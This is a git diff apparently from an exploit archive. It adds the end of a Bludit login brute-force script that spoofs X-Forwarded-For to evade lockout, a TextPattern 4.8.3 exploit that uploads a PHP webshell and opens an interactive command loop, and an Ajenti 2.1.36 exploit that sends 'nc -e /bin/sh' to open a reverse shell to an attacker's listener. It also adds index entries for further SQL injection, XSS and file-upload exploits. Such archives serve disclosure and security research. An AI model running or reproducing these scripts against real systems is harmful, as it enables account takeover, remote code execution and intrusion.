+ 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
+ 'Referer' : f"{LoginPage}",
+ 'X-Forwarded-For' : f"{Password}"
+ }
+
+#POST REQ data
+ postreqcontent = {
+ 'tokenCSRF' : f"{CSRF}",
+ 'username' : f"{Username}",
+ 'password' : f"{Password}"
+ }
+
+#Sending POST REQ
+ r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)
+
+#Printing Username:Password
+ process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))
+
+#Conditional loops
+ if 'Location' in r.headers:
+ if "/admin/dashboard" in r.headers['Location']:
+ print()
+ log.info(f'SUCCESS !!')
+ log.success(f"Use Credential -> {Username}:{Password}")
+ sys.exit(0)
+ elif "has been blocked" in r.text:
+ log.failure(f"{Password} - Word BLOCKED")
+
+#Reading User.txt & Pass.txt files
+userfile = open(Username_list).readlines()
+for Username in userfile:
+ Username = Username.strip()
+
+passfile = open(Password_list).readlines()
+for Password in passfile:
+ Password = Password.strip()
+ login(Username,Password)
\ No newline at end of file
diff --git a/exploits/php/webapps/48943.py b/exploits/php/webapps/48943.py
new file mode 100755
index 000000000..4d4a46950
--- /dev/null
+++ b/exploits/php/webapps/48943.py
@@ -0,0 +1,158 @@
+#!/usr/bin/python3
+
+# Exploit Title: TextPattern <= 4.8.3 - Authenticated Remote Code Execution via Unrestricted File Upload
+# Google Dork: N/A
+# Date: 16/10/2020
+# Exploit Author: Michele '0blio_' Cisternino
+# Vendor Homepage: https://textpattern.com/
+# Software Link: https://github.com/textpattern/textpattern
+# Version: <= 4.8.3
+# Tested on: Kali Linux x64
+# CVE: N/A
+
+import sys
+import json
+import requests
+from bs4 import BeautifulSoup as bs4
+from time import sleep
+import random
+import string
+import readline
+
+# Disable SSL warnings
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+# Simple Terminal User Interface class I wrote to print run-time logs and headers
+class Tui ():
+ def __init__ (self):
+ self.red = '\033[91m'
+ self.green = '\033[92m'
+ self.blue = '\033[94m'
+ self.yellow = '\033[93m'
+ self.pink = '\033[95m'
+ self.end = '\033[0m'
+ self.bold = '\033[1m'
+
+ def header (self, software, author, cve='N/A'):
+ print ("\n", "{}Software:{} {}".format(self.pink, self.end, software), sep='')
+ print ("{}CVE:{} {}".format(self.pink, self.end, cve))
+ print ("{}Author:{} {}\n".format(self.pink, self.end, author))
+
+ def info (self, message):
+ print ("[{}*{}] {}".format(self.blue, self.end, message))
+
+ def greatInfo (self, message):
+ print ("[{}*{}] {}{}{}".format(self.blue, self.end, self.bold, message, self.end))
+
+ def success (self, message):
+ print ("[{}✓{}] {}{}{}".format(self.green, self.end, self.bold, message, self.end))
+
+ def warning (self, message):
+ print ("[{}!{}] {}".format(self.yellow, self.end, message))
+
+ def error (self, message):
+ print ("[{}✗{}] {}".format(self.red, self.end, message))
+
+log = Tui()
+log.header (software="TextPattern <= 4.8.3", cve="CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload", author="Michele '0blio_' Cisternino")
+
+if len(sys.argv) < 4:
+ log.info ("USAGE: python3 exploit.py http://target.com username password")
+ log.info ("EXAMPLE: python3 exploit.py http://localhost admin admin\n")
+ sys.exit()
+
+# Get input from the command line
+target, username, password = sys.argv[1:4]
+
+# Fixing URL
+target = target.strip()
+if not target.startswith("https://") and not target.startswith("http://"):
+ target = "http://" + target
+if not target.endswith("/"):
+ target = target + "/"
+
+accessData = {'p_userid':username, 'p_password':password, '_txp_token':""}
+
+# Login
+log.info ("Authenticating to the target as '{}'".format(username))
+s = requests.Session()
+try:
+ r = s.post(target + "textpattern/index.php", data=accessData, verify=False)
+ sleep(1)
+ if r.status_code == 200:
+ log.success ("Logged in as '{}' (Cookie: txp_login={}; txp_login_public={})".format(username, s.cookies['txp_login'], s.cookies['txp_login_public']))
+ sleep(1)
+
+ # Parsing the response to find the upload token inside the main json array
+ log.info ("Grabbing _txp_token (required to proceed with exploitation)..")
+ soup = bs4(r.text, 'html.parser')
+ scriptJS = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-2]
+ scriptJS = json.loads(scriptJS)
+ uploadToken = scriptJS['_txp_token']
+ log.greatInfo ("Upload token grabbed successfully ({})".format(uploadToken))
+
+ # The server reply with a 401 with the user provide wrong creds as input
+ elif r.status_code == 401:
+ log.error ("Unable to login. You provided wrong credentials..\n")
+ sys.exit()
+except requests.exceptions.ConnectionError:
+ log.error ("Unable to connect to the target!")
+ sys.exit()
+
+# Crafting the upload request here
+headers = {
+ "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
+ "Accept" : "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01",
+ "Accept-Encoding" : "gzip, deflate",
+ "X-Requested-With" : "XMLHttpRequest",
+ "Connection" : "close",
+}
+
+# Generating random webshell name
+randomFilename = ''.join(random.choice(string.ascii_letters) for i in range(10)) + '.php'
+
+# Mapping multiparts here
+multipart_form_data = {
+ "fileInputOrder" : (None, '1/1'),
+ "app_mode" : (None, 'async'),
+ "MAX_FILE_SIZE" : (None, '2000000'),
+ "event" : (None, 'file'),
+ "step" : (None, 'file_insert'),
+ "id" : (None, ' '),
+ "_txp_token" : (None, uploadToken), # Token here
+ "thefile[]" : (randomFilename, '') # lol
+}
+
+# Uploading the webshell
+log.warning ("Sending payload..")
+
+try:
+ r = s.post (target + "textpattern/index.php?event=file", verify=False, headers=headers, files=multipart_form_data)
+ if "Files uploaded" in r.text:
+ log.success ("Webshell uploaded successfully as {}".format(randomFilename))
+except:
+ log.error ("Unexpected error..")
+ sys.exit()
+
+sleep(2)
+
+# Interact with the webshell (using the readline library to save the history of the executed commands at run-time)
+log.greatInfo ("Interacting with the HTTP webshell..")
+sleep (1)
+print()
+
+while 1:
+ try:
+ cmd = input ("\033[4m\033[91mwebshell\033[0m > ")
+ if cmd == 'exit':
+ raise KeyboardInterrupt
+ r = requests.get (target + "files/" + randomFilename + "?efcd=" + cmd, verify=False)
+ print (r.text)
+ except KeyboardInterrupt:
+ log.warning ("Stopped.")
+ exit()
+ except:
+ log.error ("Unexpected error..")
+ sys.exit()
+
+print()
\ No newline at end of file
diff --git a/exploits/python/webapps/48929.py b/exploits/python/webapps/48929.py
new file mode 100755
index 000000000..3529c82f8
--- /dev/null
+++ b/exploits/python/webapps/48929.py
@@ -0,0 +1,53 @@
+ #!/usr/bin/python3
+
+import requests
+import sys
+import warnings
+from bs4 import BeautifulSoup
+import json
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+if len(sys.argv) < 6:
+ print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
+ exit()
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+
+req = requests.session()
+login_creds = {
+ "username":username,
+ "password":password,
+ "mode":"normal"}
+
+
+
+print("[+] Sendin login request...")
+login = req.post(url+"/api/core/auth", json = login_creds)
+
+
+if username in login.text:
+
+ page = url + "/api/terminal/create"
+
+ payload = {
+
+ 'command':'nc -e /bin/sh ' + ip + ' ' + port ,
+ 'autoclose':True
+
+
+ }
+ payload = json.dumps(payload)
+ print("[+] Sending payload...")
+
+ send_payload = req.post(page, payload)
+
+ print("[+] Check your listener !...")
+
+else:
+ print("[-] Wrong credentials or may the system patched.")
+ exit()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ab5e87ad1..dfcd07756 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -40746,6 +40746,22 @@ id,file,description,date,author,type,platform,port
48925,exploits/php/webapps/48925.txt,"Stock Management System 1.0 - 'Categories Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
48926,exploits/php/webapps/48926.txt,"Stock Management System 1.0 - 'Brand Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
48927,exploits/php/webapps/48927.py,"Tiki Wiki CMS Groupware 21.1 - Authentication Bypass",2020-10-21,"Maximilian Barz",webapps,php,
+48928,exploits/php/webapps/48928.txt,"Online Library Management System 1.0 - Arbitrary File Upload",2020-10-23,"Jyotsna Adhana",webapps,php,
+48929,exploits/python/webapps/48929.py,"Ajenti 2.1.36 - Remote Code Execution (Authenticated)",2020-10-23,"Ahmet Ümit BAYRAM",webapps,python,
+48930,exploits/php/webapps/48930.txt,"Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection",2020-10-23,"Ihsan Sencan",webapps,php,
+48931,exploits/php/webapps/48931.txt,"Car Rental Management System 1.0 - Arbitrary File Upload",2020-10-23,"Jyotsna Adhana",webapps,php,
+48932,exploits/php/webapps/48932.txt,"User Registration & Login and User Management System 2.1 - SQL Injection",2020-10-23,"Ihsan Sencan",webapps,php,
+48933,exploits/php/webapps/48933.txt,"Point of Sales 1.0 - 'id' SQL Injection",2020-10-23,"Ankita Pal",webapps,php,
+48934,exploits/php/webapps/48934.txt,"Lot Reservation Management System 1.0 - Authentication Bypass",2020-10-23,"Ankita Pal",webapps,php,
+48935,exploits/php/webapps/48935.txt,"Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)",2020-10-23,"Ankita Pal",webapps,php,
+48936,exploits/php/webapps/48936.txt,"Gym Management System 1.0 - 'id' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php,
+48937,exploits/php/webapps/48937.txt,"Point of Sales 1.0 - 'username' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php,
+48938,exploits/php/webapps/48938.txt,"School Faculty Scheduling System 1.0 - 'id' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php,
+48939,exploits/php/webapps/48939.txt,"School Faculty Scheduling System 1.0 - 'username' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php,
+48940,exploits/php/webapps/48940.txt,"Gym Management System 1.0 - Authentication Bypass",2020-10-23,"Jyotsna Adhana",webapps,php,
+48941,exploits/php/webapps/48941.txt,"Gym Management System 1.0 - Stored Cross Site Scripting",2020-10-23,"Jyotsna Adhana",webapps,php,
+48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,
+48943,exploits/php/webapps/48943.py,"TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)",2020-10-23,0blio_,webapps,php,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,